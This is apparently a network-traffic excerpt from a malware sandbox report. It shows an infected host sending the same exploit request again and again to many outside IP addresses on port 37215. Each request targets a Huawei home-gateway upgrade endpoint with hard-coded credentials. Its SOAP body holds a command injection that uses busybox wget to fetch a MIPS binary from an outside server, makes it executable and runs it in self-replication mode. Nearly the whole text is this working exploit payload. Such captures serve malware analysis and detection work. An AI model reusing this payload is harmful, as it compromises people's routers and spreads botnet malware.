                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1471192.168.2.2333824153.231.120.20237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.542651892 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1472192.168.2.2355640197.18.133.2037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.542656898 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1473192.168.2.2352362157.233.172.13137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.542684078 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1474192.168.2.235262841.188.90.9137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.542686939 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1475192.168.2.2359676108.173.173.12137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.542751074 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1476192.168.2.2346196197.188.107.20637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.542762995 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1477192.168.2.2349450197.156.61.11237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.542763948 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1478192.168.2.235206641.59.82.737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.542773962 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1479192.168.2.234937641.246.107.14737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.542774916 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1480192.168.2.2354552157.13.8.15437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.542774916 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
